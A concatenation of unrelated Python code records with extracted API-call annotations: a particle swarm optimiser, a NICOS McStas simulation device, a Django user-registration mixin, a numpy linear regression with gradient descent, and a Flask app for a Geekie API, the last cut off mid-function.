        start = time.time()
        # Initialize the best starting position
        gbest : List[int]
        vgbest : int = cast(int, float("inf"))
        for particle in self.swarm:
            if particle.vpbest < vgbest:
                gbest, vgbest = list(particle.pbest), particle.vpbest
        # new_gbest/new_vgbest accumulate the best of the epoch; gbest/vgbest
        # are only promoted at the end of each epoch.
        new_vgbest : int = vgbest
        new_gbest : List[int] = list(gbest)
        self.history = [vgbest]
        # Iterations
        noimp = 0
        for i in range(self.era):
            for particle in self.swarm:
                pbest, vpbest = particle.move (gbest, vgbest)
                if vpbest < new_vgbest:
                    new_gbest, new_vgbest = list(pbest), vpbest
            if new_vgbest < vgbest:
                gbest, vgbest = new_gbest, new_vgbest
                noimp = 0
                self.computations = sum(p.explorations for p in self.swarm)
            else:
                noimp += 1
                # Stop early after max_noimp epochs without improvement.
                if noimp > self.max_noimp:
                    break
            self.history.append(vgbest)
            if i % self.print_every == 0 and verbose is True:
                print('Epoch', i, ' Best: ', vgbest)
        # Final deepsearch
        if self.finalsearch is True:
            for particle in self.swarm:
                particle.deep_search (list(particle.current), True, 0)
                if particle.vcurrent < particle.vpbest:
                    particle.pbest, particle.vpbest = list(particle.current), particle.vcurrent
                if particle.vpbest < vgbest:
                    gbest, vgbest = list(particle.current), particle.vcurrent
        self.computations = sum(p.explorations for p in self.swarm)
        # Set computational time
        self.computational_time = time.time() - start
        return gbest, vgbest
|
[
"math.exp",
"random.shuffle",
"time.time",
"random.random",
"math.log"
] |
[((2424, 2444), 'math.exp', 'math.exp', (['(-alpha * x)'], {}), '(-alpha * x)\n', (2432, 2444), False, 'import math\n'), ((1867, 1890), 'math.log', 'math.log', (['(max_v + min_v)'], {}), '(max_v + min_v)\n', (1875, 1890), False, 'import math\n'), ((6090, 6118), 'random.shuffle', 'random.shuffle', (['self.current'], {}), '(self.current)\n', (6104, 6118), False, 'import random\n'), ((6213, 6243), 'random.shuffle', 'random.shuffle', (['self.intention'], {}), '(self.intention)\n', (6227, 6243), False, 'import random\n'), ((10125, 10155), 'random.shuffle', 'random.shuffle', (['self.intention'], {}), '(self.intention)\n', (10139, 10155), False, 'import random\n'), ((10349, 10364), 'random.random', 'random.random', ([], {}), '()\n', (10362, 10364), False, 'import random\n'), ((11426, 11447), 'random.shuffle', 'random.shuffle', (['edges'], {}), '(edges)\n', (11440, 11447), False, 'import random\n'), ((15085, 15096), 'time.time', 'time.time', ([], {}), '()\n', (15094, 15096), False, 'import time\n'), ((1957, 1976), 'math.exp', 'math.exp', (['(alpha * x)'], {}), '(alpha * x)\n', (1965, 1976), False, 'import math\n'), ((9467, 9482), 'random.random', 'random.random', ([], {}), '()\n', (9480, 9482), False, 'import random\n'), ((10445, 10460), 'random.random', 'random.random', ([], {}), '()\n', (10458, 10460), False, 'import random\n'), ((16866, 16877), 'time.time', 'time.time', ([], {}), '()\n', (16875, 16877), False, 'import time\n'), ((451, 466), 'random.random', 'random.random', ([], {}), '()\n', (464, 466), False, 'import random\n'), ((709, 724), 'random.random', 'random.random', ([], {}), '()\n', (722, 724), False, 'import random\n')]
|
# -*- coding: utf-8 -*-
# *****************************************************************************
# NICOS, the Networked Instrument Control System of the MLZ
# Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Module authors:
# <NAME> <<EMAIL>>
#
# *****************************************************************************
"""VTREFF detector image based on McSTAS simulation."""
from nicos.core import Attach, Override, Readable
from nicos.devices.generic import Slit
from nicos.devices.mcstas import McStasSimulation as BaseSimulation
from nicos_mlz.treff.devices import MirrorSample
class McStasSimulation(BaseSimulation):
    """McStas simulation (program 'treff_fast') fed from the attached slit,
    sample-position and rotation devices."""
    parameter_overrides = {
        'mcstasprog': Override(default='treff_fast'),
    }
    attached_devices = {
        'sample': Attach('Mirror sample', MirrorSample),
        's1': Attach('Slit 1', Slit),
        's2': Attach('Slit 2', Slit),
        'sample_x': Attach('Sample position x', Readable),
        'sample_y': Attach('Sample position y', Readable),
        'sample_z': Attach('Sample position z', Readable),
        'beamstop': Attach('Beam stop positon', Readable),
        'omega': Attach('Sample omega rotation', Readable),
        'chi': Attach('Sample chi rotation', Readable),
        'phi': Attach('Sample phi rotation', Readable),
        'detarm': Attach('Position detector arm', Readable),
    }
    def _prepare_params(self):
        """Build the list of 'name=value' parameter strings passed to the
        McStas simulation.

        Geometry values are read live from the attached devices; sample_y,
        omega, chi and detarm additionally fold in the device offset and the
        sample's stored misalignment.  Mirror properties come straight from
        the attached sample.
        """
        params = []
        sample = self._attached_sample
        params.append('s1_width=%s' % self._attached_s1.width.read(0))
        params.append('s1_height=%s' % self._attached_s1.height.read(0))
        params.append('s2_width=%s' % self._attached_s2.width.read(0))
        params.append('s2_height=%s' % self._attached_s2.height.read(0))
        params.append('sample_x=%s' % self._attached_sample_x.read(0))
        sample_y = self._attached_sample_y
        # Device value + device offset + stored sample misalignment.
        params.append('sample_y=%s' % (sample_y.read(0) + sample_y.offset +
                                       sample._misalignments['sample_y']))
        params.append('sample_z=%s' % self._attached_sample_z.read(0))
        params.append('beamstop_pos=%s' % self._attached_beamstop.read(0))
        omega = self._attached_omega
        params.append('omega=%s' % (
            omega.read(0) + omega.offset + sample._misalignments['omega']))
        chi = self._attached_chi
        params.append('chi=%s' % (
            chi.read(0) + chi.offset + sample._misalignments['chi']))
        params.append('phi=%s' % self._attached_phi.read(0))
        detarm = self._attached_detarm
        params.append('detarm=%s' % (
            detarm.read(0) + detarm.offset + sample._misalignments['detarm']))
        params.append('mirror_length=%s' % self._attached_sample.length)
        params.append('mirror_thickness=%s' % self._attached_sample.thickness)
        params.append('mirror_height=%s' % self._attached_sample.height)
        params.append('mirror_m=%s' % self._attached_sample.m)
        params.append('mirror_alfa=%s' % self._attached_sample.alfa)
        params.append('mirror_wav=%s' % self._attached_sample.waviness)
        # Reflectivity file is optional; '0' tells the simulation to go without.
        if self._attached_sample.rflfile:
            params.append('rflfile=%s' %
                          self._attached_sample.getReflectivityFile())
        else:
            params.append('rflfile=0')
        return params
|
[
"nicos.core.Attach",
"nicos.core.Override"
] |
[((1414, 1444), 'nicos.core.Override', 'Override', ([], {'default': '"""treff_fast"""'}), "(default='treff_fast')\n", (1422, 1444), False, 'from nicos.core import Attach, Override, Readable\n'), ((1496, 1533), 'nicos.core.Attach', 'Attach', (['"""Mirror sample"""', 'MirrorSample'], {}), "('Mirror sample', MirrorSample)\n", (1502, 1533), False, 'from nicos.core import Attach, Override, Readable\n'), ((1549, 1571), 'nicos.core.Attach', 'Attach', (['"""Slit 1"""', 'Slit'], {}), "('Slit 1', Slit)\n", (1555, 1571), False, 'from nicos.core import Attach, Override, Readable\n'), ((1587, 1609), 'nicos.core.Attach', 'Attach', (['"""Slit 2"""', 'Slit'], {}), "('Slit 2', Slit)\n", (1593, 1609), False, 'from nicos.core import Attach, Override, Readable\n'), ((1631, 1668), 'nicos.core.Attach', 'Attach', (['"""Sample position x"""', 'Readable'], {}), "('Sample position x', Readable)\n", (1637, 1668), False, 'from nicos.core import Attach, Override, Readable\n'), ((1690, 1727), 'nicos.core.Attach', 'Attach', (['"""Sample position y"""', 'Readable'], {}), "('Sample position y', Readable)\n", (1696, 1727), False, 'from nicos.core import Attach, Override, Readable\n'), ((1749, 1786), 'nicos.core.Attach', 'Attach', (['"""Sample position z"""', 'Readable'], {}), "('Sample position z', Readable)\n", (1755, 1786), False, 'from nicos.core import Attach, Override, Readable\n'), ((1808, 1845), 'nicos.core.Attach', 'Attach', (['"""Beam stop positon"""', 'Readable'], {}), "('Beam stop positon', Readable)\n", (1814, 1845), False, 'from nicos.core import Attach, Override, Readable\n'), ((1864, 1905), 'nicos.core.Attach', 'Attach', (['"""Sample omega rotation"""', 'Readable'], {}), "('Sample omega rotation', Readable)\n", (1870, 1905), False, 'from nicos.core import Attach, Override, Readable\n'), ((1922, 1961), 'nicos.core.Attach', 'Attach', (['"""Sample chi rotation"""', 'Readable'], {}), "('Sample chi rotation', Readable)\n", (1928, 1961), False, 'from nicos.core import Attach, Override, 
Readable\n'), ((1978, 2017), 'nicos.core.Attach', 'Attach', (['"""Sample phi rotation"""', 'Readable'], {}), "('Sample phi rotation', Readable)\n", (1984, 2017), False, 'from nicos.core import Attach, Override, Readable\n'), ((2037, 2078), 'nicos.core.Attach', 'Attach', (['"""Position detector arm"""', 'Readable'], {}), "('Position detector arm', Readable)\n", (2043, 2078), False, 'from nicos.core import Attach, Override, Readable\n')]
|
# Django
from django.contrib.auth import login
# Third Party
import requests
# SquareletAuth
from squarelet_auth.users.utils import squarelet_update_or_create
from squarelet_auth.utils import squarelet_post
class MiniregMixin:
    """A mixin to expose miniregister functionality to a view"""

    minireg_source = "Default"
    field_map = {}

    def _create_squarelet_user(self, form, data):
        """Create a corresponding user on squarelet

        :param form: The form the registration came from; squarelet
            validation errors are attached to it.
        :param data: The payload POSTed to the squarelet user endpoint.
        :return: The JSON payload describing the created user.
        :raises requests.exceptions.RequestException: If the user service is
            unreachable or returns an error status.
        """
        generic_error = (
            "Sorry, something went wrong with the user service. "
            "Please try again later"
        )
        try:
            resp = squarelet_post("/api/users/", data=data)
        except requests.exceptions.RequestException:
            form.add_error(None, generic_error)
            raise
        # Bug fix: floor division -- with true division (`/`) every non-200
        # 2xx status (e.g. 201 Created) was treated as an error.
        if resp.status_code // 100 != 2:
            try:
                error_json = resp.json()
            except ValueError:
                # Non-JSON error body: fall back to the generic message.
                form.add_error(None, generic_error)
            else:
                # Bug fix: dict.iteritems() does not exist in Python 3.
                for field, errors in error_json.items():
                    for error in errors:
                        form.add_error(self.field_map.get(field, field), error)
            finally:
                # Always surface the HTTP error to the caller.
                resp.raise_for_status()
        return resp.json()

    def miniregister(self, form, full_name, email):
        """Create a new user from their full name and email"""
        full_name = full_name.strip()
        user_json = self._create_squarelet_user(
            form, {"name": full_name, "preferred_username": full_name, "email": email}
        )
        # Mirror the squarelet user locally, then log them in.
        user, _ = squarelet_update_or_create(user_json["uuid"], user_json)
        login(self.request, user, backend="squarelet_auth.backends.SquareletBackend")
        return user
|
[
"django.contrib.auth.login",
"squarelet_auth.users.utils.squarelet_update_or_create",
"squarelet_auth.utils.squarelet_post"
] |
[((1576, 1632), 'squarelet_auth.users.utils.squarelet_update_or_create', 'squarelet_update_or_create', (["user_json['uuid']", 'user_json'], {}), "(user_json['uuid'], user_json)\n", (1602, 1632), False, 'from squarelet_auth.users.utils import squarelet_update_or_create\n'), ((1641, 1718), 'django.contrib.auth.login', 'login', (['self.request', 'user'], {'backend': '"""squarelet_auth.backends.SquareletBackend"""'}), "(self.request, user, backend='squarelet_auth.backends.SquareletBackend')\n", (1646, 1718), False, 'from django.contrib.auth import login\n'), ((627, 667), 'squarelet_auth.utils.squarelet_post', 'squarelet_post', (['"""/api/users/"""'], {'data': 'data'}), "('/api/users/', data=data)\n", (641, 667), False, 'from squarelet_auth.utils import squarelet_post\n')]
|
import argparse
def opts():
    """
    Build and parse the command-line options for the domain-adaptation
    training script.

    Option groups: data paths / domain names, optimisation hyper-parameters,
    checkpointing, graph construction, architecture / method flags and i/o.
    After parsing, derived fields are filled in: both target data roots reuse
    the source root, ``src_t`` mirrors ``tar`` and the log directory name is
    extended with the main experiment settings.

    :return: The parsed ``argparse.Namespace``.
    """
    parser = argparse.ArgumentParser(description='Train alexnet on the cub200 dataset',
                                    formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--data_path_source', type=str, default='',
                        help='Root of train data set of the source domain')
    parser.add_argument('--data_path_source_t', type=str, default='',
                        help='Root of train data set of the target domain')
    parser.add_argument('--data_path_target', type=str, default='',
                        help='Root of the test data set')
    parser.add_argument('--src', type=str, default='amazon',
                        help='choose between amazon | dslr | webcam')
    parser.add_argument('--src_t', type=str, default='webcam',
                        help='choose between amazon | dslr | webcam')
    parser.add_argument('--tar', type=str, default='webcam',
                        help='choose between amazon | dslr | webcam')
    parser.add_argument('--num_classes', type=int, default=31,
                        help='number of classes of data used to fine-tune the pre-trained model')
    # Optimization options
    parser.add_argument('--epochs', '-e', type=int, default=200, help='Number of epochs to train')
    parser.add_argument('--batch_size', type=int, default=64, help='Batch size of the source data.')
    parser.add_argument('--lr', '--learning_rate', type=float, default=0.01, help='The Learning Rate.')
    parser.add_argument('--lrw', type=float, default=1.0, help='The Learning Rate.')
    parser.add_argument('--momentum', '-m', type=float, default=0.9, help='Momentum.')
    parser.add_argument('--weight_decay', '-wd', type=float, default=0.0001, help='Weight decay (L2 penalty).')
    parser.add_argument('--schedule', type=str, default='rev', help='rev | constant')
    parser.add_argument('--gamma', type=float, default=0.75, help='2.25 (visda) and 0.75 (others).')
    # checkpoints
    parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
                        help='manual epoch number (useful on restarts)')
    parser.add_argument('--resume', type=str, default='', help='Checkpoints path to resume(default none)')
    parser.add_argument('--pretrained_checkpoint', type=str, default='', help='Pretrained checkpoint to resume (default none)')
    parser.add_argument('--test_only', '-t', action='store_true', help='Test only flag')
    #### graph
    parser.add_argument('--dis_gra', type=str, default='l2', help='dis for graph')
    parser.add_argument('--cor', type=float, default=1.0, help='cor in the computation of l2 distance')
    parser.add_argument('--TopkGraph', action='store_true', help='full graph 2 topk graph')
    parser.add_argument('--graphk', type=int, default=10, help='KNN grapg')
    parser.add_argument('--AlphaGraph', type=float, default=0.5, help='level for propagation.')
    parser.add_argument('--noise_level', type=float, default=0.1, help='cor in the computation of l2 distance')
    parser.add_argument('--noise_flag', action='store_true', help='full graph 2 topk graph')
    # Architecture
    parser.add_argument('--arch', type=str, default='resnet101', help='Model name')
    parser.add_argument('--img_process_t', type=str, default='simple', help='Model name')
    parser.add_argument('--img_process_s', type=str, default='simple', help='Model name')
    parser.add_argument('--flag', type=str, default='original', help='flag for different settings')
    parser.add_argument('--type', type=str, default='type1', help='type1 | type2 | type3')
    parser.add_argument('--dis', type=str, default='cross_entropy', help='cross_entropy | kl | l1')
    parser.add_argument('--pretrained', action='store_true', help='whether using pretrained model')
    parser.add_argument('--per_category', type=int, default=4, help='number of domains')
    parser.add_argument('--fea_dim', type=int, default=2048, help='feature dim')
    parser.add_argument('--uniform_type_s', type=str, default='soft', help='hard | soft | none')
    parser.add_argument('--uniform_type_t', type=str, default='soft', help='hard | soft | none')
    parser.add_argument('--dsbn', action='store_true', help='whether use domain specific bn')
    parser.add_argument('--fixbn', action='store_true', help='whether fix the ImageNet pretrained BN layer')
    parser.add_argument('--OurMec', action='store_true', help='whether use our cross entropy style MEC | original mec')
    parser.add_argument('--OurPseudo', action='store_true', help='whether use cluster label for cross entropy directly | tangs')
    parser.add_argument('--category_mean', action='store_true', help='Only True for visda, acc calculated over categories')
    parser.add_argument('--clufrq_dec', action='store_true', help='whether decrease the cluster freq.')
    parser.add_argument('--threed', action='store_true', help='ori + aug + grey | ori + grey.')
    parser.add_argument('--only_lrw', action='store_true', help='lrw weight | lamda')
    parser.add_argument('--niter', type=int, default=500, help='iteration of clustering')
    parser.add_argument('--pseudo_type', type=str, default='cluster', help='cluster (spherical_kmeans cluster) or lp (label propagation)')
    parser.add_argument('--l2_process', action='store_true', help='')
    parser.add_argument('--spherical_kmeans', action='store_true', help='')
    parser.add_argument('--entropy_weight', action='store_true', help='whether adopt the prediction entropy of LP prediction as weight')
    parser.add_argument('--S4LP', type=str, default='all', help='all | cluster | center')
    parser.add_argument('--LPSolver', type=str, default='Itera', help='Itera | CloseF')
    parser.add_argument('--LPType', type=str, default='lgc', help='lgc | hmn | parw | omni')
    parser.add_argument('--alpha', type=float, default=0.99, help='hyper-parameter.')
    parser.add_argument('--lamb', type=float, default=1.0, help='hyper-parameter')
    parser.add_argument('--NC4LP', type=int, default=3, help='number of clusters for each category in clustering')
    parser.add_argument('--LPIterNum', type=int, default=15, help='number of clusters for each category in clustering')
    parser.add_argument('--LPIterationType', type=str, default='add', help='replace | add')
    parser.add_argument('--min_num_cate', type=int, default=3, help='lowest number of image in each class')
    parser.add_argument('--filter_low', action='store_true', help='filter the samples with low prediction confidence')
    parser.add_argument('--cos_threshold', type=float, default=0.05, help='hyper-parameter.')
    parser.add_argument('--weight_type', type=str, default='cas_ins', help='replace | add')
    parser.add_argument('--graph_gama', type=int, default=1, help='for graph construction, follow manifold-based search')
    parser.add_argument('--dis_margin', type=float, default=1.0, help='hyper-parameter.')
    parser.add_argument('--moving_weight', type=float, default=0.7, help='hyper-parameter.')
    # i/o
    parser.add_argument('--log', type=str, default='./checkpoints', help='Log folder')
    parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
                        help='number of data loading workers (default: 4)')
    parser.add_argument('--test_freq', default=10, type=int,
                        help='test frequency (default: 1)')
    parser.add_argument('--cluster_freq', default=1, type=int,
                        help='clustering frequency (default: 1)')
    parser.add_argument('--print_freq', '-p', default=10, type=int,
                        metavar='N', help='print frequency (default: 10)')
    parser.add_argument('--score_frep', default=300, type=int,
                        metavar='N', help='print frequency (default: 300, not download score)')
    args = parser.parse_args()
    # Derived settings: all data roots share the source root, the auxiliary
    # source domain mirrors the target, and the log dir encodes the setup.
    args.data_path_source_t = args.data_path_source
    args.data_path_target = args.data_path_source
    args.src_t = args.tar
    args.log = args.log + '_' + args.src + '2' + args.tar + '_' + args.arch + '_' + args.flag + '_' + args.type + '_' + \
               args.dis + '_' + args.uniform_type_s + '_' + args.pseudo_type + str(args.lrw) + '_' + str(args.cos_threshold) + args.dis_gra
    return args
|
[
"argparse.ArgumentParser"
] |
[((43, 177), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train alexnet on the cub200 dataset"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Train alexnet on the cub200 dataset',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n", (66, 177), False, 'import argparse\n')]
|
#%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model, metrics, preprocessing
from sklearn.model_selection import train_test_split
import itertools
import typing
class LinearRegression():
    """Ordinary least-squares linear model trained by an external optimiser."""

    def __init__(self, n_features, optimiser):
        """
        :param n_features: Number of input features (length of the weight vector).
        :param optimiser: Object exposing ``epochs`` and ``step(w, b, X, y_pred, y)``.
        """
        # Fixed seed so the random initialisation is reproducible.
        np.random.seed(2)
        self.w = np.random.randn(n_features)
        self.b = np.random.randn()
        self.optimiser = optimiser

    def fit(self, X, y):
        '''
        Fit model to data
        '''
        history = []
        for _ in range(self.optimiser.epochs):
            predictions = self.predict(X)
            updated_w, updated_b = self.optimiser.step(self.w, self.b, X, predictions, y)
            self._update_params(updated_w, updated_b)
            history.append(LinearRegression.mse_loss(predictions, y))
        LinearRegression.plot_loss(history)
        print('Final cost:', history[-1])
        print('Weight values:', self.w)
        print('Bias values:', self.b)

    def predict(self, X):
        '''
        Calculate prediction
        '''
        return np.dot(X, self.w) + self.b

    @staticmethod
    def mse_loss(y_pred, y_true):
        '''
        Calculate mean squared error
        '''
        residuals = y_pred - y_true
        return 1 / residuals.size * np.dot(residuals.T, residuals)

    @staticmethod
    def plot_loss(losses):
        '''
        Plot losses
        '''
        plt.figure()
        plt.ylabel('Cost')
        plt.xlabel('Epoch')
        plt.plot(losses)
        plt.show()

    def _update_params(self, w, b):
        '''
        Update parameters
        '''
        self.w, self.b = w, b
        return w, b

    def score(self, y_pred, y_true):
        '''
        Calculate R2 score
        '''
        residual = y_pred - y_true
        u = np.dot(residual.T, residual)
        baseline = np.full(y_true.shape, np.mean(y_true))
        deviation = baseline - y_true
        v = np.dot(deviation.T, deviation)
        return 1 - u/v
class SGDOptimiser:
    """Gradient-descent optimiser for linear-regression parameters."""

    def __init__(self, alpha, epochs):
        """
        :param alpha: Learning rate.
        :param epochs: Number of training epochs the caller should run.
        """
        self.alpha = alpha
        self.epochs = epochs

    def _calc_deriv(self, X, y_pred, y_true):
        '''
        Calculate derivative of mean square error (loss) with respect to the
        weights and the bias.

        :param X: Input matrix of shape (m, n_features).
        :param y_pred: Predicted targets, shape (m,).
        :param y_true: True targets, shape (m,).
        :return: (dLdw, dLdb) -- per-feature weight gradient and bias gradient.
        '''
        m = y_pred.size
        errors = y_pred - y_true
        # Bug fix: sum per feature (axis=1). The previous axis-less np.sum
        # collapsed the whole product to one scalar, so every weight received
        # the same gradient. Debug prints removed.
        dLdw = 2 / m * np.sum(X.T * errors, axis=1)
        dLdb = 2 / m * np.sum(errors)
        return dLdw, dLdb

    def step(self, w, b, X, y_pred, y_true):
        '''
        Calculate updated parameters to decrease mean square error.

        :return: (new_w, new_b) after one gradient-descent step.
        '''
        dLdw, dLdb = self._calc_deriv(X, y_pred, y_true)
        new_w = w - self.alpha * dLdw
        new_b = b - self.alpha * dLdb
        return new_w, new_b
class DataLoader:
    """Shuffled container that hands out samples in chunks."""

    def __init__(self, X, y):
        # Shuffle samples and targets with the same permutation so pairs stay aligned.
        idx = np.random.permutation(X.shape[0])
        self.X = X[idx]
        self.y = y[idx]

    def yield_data(self, n):
        """Remove and return the first n + 1 samples and their targets.

        NOTE(review): returns n + 1 items (slice [0:n+1]) -- kept as-is for
        backward compatibility with existing callers.
        """
        X_yield = self.X[0:n + 1]
        y_yield = self.y[0:n + 1]
        self.X = self.X[n + 1:]
        self.y = self.y[n + 1:]
        return X_yield, y_yield

    def add_data(self, X_new, y_new):
        """Append new samples and targets to the loader.

        Bug fix: previously appended to the *global* ``X``/``y`` arrays
        instead of the loader's own data.
        """
        self.X = np.append(self.X, X_new)
        self.y = np.append(self.y, y_new)
#%%
# Reproducible split / initialisation.
np.random.seed(2)
# California housing regression dataset (features X, target house value y).
X, y = datasets.fetch_california_housing(return_X_y=True)
scaler = preprocessing.StandardScaler()
# 70% train; the remaining 30% is split evenly into test and validation.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
X_test, X_val, y_test, y_val = train_test_split(X_test, y_test, test_size=0.5)
# Fit the scaler on the training set only, then apply it everywhere.
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
X_val = scaler.transform(X_val)
np.random.seed(2)
epochs = 1000
a = 0.001  # learning rate
optimiser = SGDOptimiser(alpha=a, epochs=epochs)
model = LinearRegression(optimiser=optimiser, n_features=X_train.shape[1])
model.fit(X_train, y_train)
# R^2 of the fitted model on the *training* data.
y_pred = model.predict(X_train)
score = model.score(y_pred,y_train)
print(score)
# %%
# %%
|
[
"numpy.random.seed",
"sklearn.preprocessing.StandardScaler",
"matplotlib.pyplot.plot",
"numpy.random.randn",
"matplotlib.pyplot.show",
"sklearn.model_selection.train_test_split",
"numpy.sum",
"sklearn.datasets.fetch_california_housing",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.random.permutation",
"numpy.dot",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((3275, 3292), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3289, 3292), True, 'import numpy as np\n'), ((3300, 3350), 'sklearn.datasets.fetch_california_housing', 'datasets.fetch_california_housing', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (3333, 3350), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3360, 3390), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (3388, 3390), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3426, 3463), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (3442, 3463), False, 'from sklearn.model_selection import train_test_split\n'), ((3495, 3542), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_test', 'y_test'], {'test_size': '(0.5)'}), '(X_test, y_test, test_size=0.5)\n', (3511, 3542), False, 'from sklearn.model_selection import train_test_split\n'), ((3650, 3667), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3664, 3667), True, 'import numpy as np\n'), ((308, 325), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (322, 325), True, 'import numpy as np\n'), ((343, 370), 'numpy.random.randn', 'np.random.randn', (['n_features'], {}), '(n_features)\n', (358, 370), True, 'import numpy as np\n'), ((388, 405), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (403, 405), True, 'import numpy as np\n'), ((1470, 1482), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1480, 1482), True, 'import matplotlib.pyplot as plt\n'), ((1491, 1509), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Cost"""'], {}), "('Cost')\n", (1501, 1509), True, 'import matplotlib.pyplot as plt\n'), ((1518, 1537), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epoch"""'], {}), "('Epoch')\n", (1528, 1537), True, 'import matplotlib.pyplot as plt\n'), ((1546, 1562), 
'matplotlib.pyplot.plot', 'plt.plot', (['losses'], {}), '(losses)\n', (1554, 1562), True, 'import matplotlib.pyplot as plt\n'), ((1571, 1581), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1579, 1581), True, 'import matplotlib.pyplot as plt\n'), ((1828, 1872), 'numpy.dot', 'np.dot', (['(y_pred - y_true).T', '(y_pred - y_true)'], {}), '((y_pred - y_true).T, y_pred - y_true)\n', (1834, 1872), True, 'import numpy as np\n'), ((1948, 2002), 'numpy.dot', 'np.dot', (['(y_true_mean - y_true).T', '(y_true_mean - y_true)'], {}), '((y_true_mean - y_true).T, y_true_mean - y_true)\n', (1954, 2002), True, 'import numpy as np\n'), ((2889, 2922), 'numpy.random.permutation', 'np.random.permutation', (['X.shape[0]'], {}), '(X.shape[0])\n', (2910, 2922), True, 'import numpy as np\n'), ((3213, 3232), 'numpy.append', 'np.append', (['X', 'X_new'], {}), '(X, X_new)\n', (3222, 3232), True, 'import numpy as np\n'), ((3250, 3269), 'numpy.append', 'np.append', (['y', 'y_new'], {}), '(y, y_new)\n', (3259, 3269), True, 'import numpy as np\n'), ((1084, 1101), 'numpy.dot', 'np.dot', (['X', 'self.w'], {}), '(X, self.w)\n', (1090, 1101), True, 'import numpy as np\n'), ((1328, 1352), 'numpy.dot', 'np.dot', (['errors.T', 'errors'], {}), '(errors.T, errors)\n', (1334, 1352), True, 'import numpy as np\n'), ((1919, 1934), 'numpy.mean', 'np.mean', (['y_true'], {}), '(y_true)\n', (1926, 1934), True, 'import numpy as np\n'), ((2461, 2475), 'numpy.sum', 'np.sum', (['errors'], {}), '(errors)\n', (2467, 2475), True, 'import numpy as np\n'), ((2390, 2410), 'numpy.sum', 'np.sum', (['(X.T * errors)'], {}), '(X.T * errors)\n', (2396, 2410), True, 'import numpy as np\n')]
|
#----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
from flask import Flask, redirect, render_template, request, url_for
import logging
from logging import Formatter, FileHandler
from forms import *
import os
from geekie_api_client import GeekieAPIClient
from geekie_oauth import OAuthClient
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
# Flask application object; settings are loaded from the local ``config`` module.
app = Flask(__name__)
app.config.from_object("config")
# Shared Geekie API client stored on the app config so every view can fetch it.
app.config["geekie_api_client"] = GeekieAPIClient(
    shared_secret=app.config.get("GEEKIE_API_SHARED_SECRET"),
)
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route("/")
def home():
    """Render the landing page."""
    template_name = "pages/home.html"
    return render_template(template_name)
@app.route("/who-am-i", methods=["POST"])
def who_am_i():
    """Resolve the posted organization_id through the Geekie API and redirect
    to that organization's page."""
    client = app.config.get("geekie_api_client")
    response = client.who_am_i(request.form["organization_id"])
    org_id = response.get("organization_id")
    return redirect(url_for("show_organization", organization_id=org_id))
@app.route("/organizations/<organization_id>")
def show_organization(organization_id):
    """Render the organization landing page."""
    context = {"organization_id": organization_id}
    return render_template("pages/show_organization.html", **context)
@app.route("/organizations/<organization_id>/members")
def list_organization_memberships(organization_id):
    """List an organization's members together with per-member OAuth launch
    parameters for the template."""
    api_client = app.config.get("geekie_api_client")
    memberships = api_client.get_all_memberships(organization_id)["results"]
    shared_secret = app.config.get("GEEKIE_API_SHARED_SECRET")
    # One OAuthClient per member; the template signs each launch with these.
    oauth_params = {
        member["id"]: OAuthClient(
            shared_secret=shared_secret,
            organization_id=organization_id,
            user_id=member["id"],
        ).get_oauth_params()
        for member in memberships
    }
    return render_template(
        "pages/members.html",
        organization_id=organization_id,
        memberships=memberships,
        oauth_params=oauth_params,
    )
@app.route("/organizations/<organization_id>/memberships", methods=["POST"])
def create_membership(organization_id):
    """Create a membership from the posted full_name, then go back to the list."""
    client = app.config.get("geekie_api_client")
    payload = {"full_name": request.form["full_name"]}
    client.create_membership(
        organization_id=organization_id,
        membership_data=payload,
    )
    return redirect(
        url_for("list_organization_memberships", organization_id=organization_id)
    )
@app.route("/organizations/<organization_id>/memberships/<membership_id>/edit", methods=["GET"])
def edit_membership(organization_id, membership_id):
    """Show the edit form for a single membership."""
    client = app.config.get("geekie_api_client")
    membership = client.get_membership(organization_id, membership_id)
    context = {
        "organization_id": organization_id,
        "membership_id": membership_id,
        "membership": membership,
    }
    return render_template("pages/edit_member.html", **context)
@app.route("/organizations/<organization_id>/memberships/<membership_id>", methods=["POST"])
def update_membership(organization_id, membership_id):
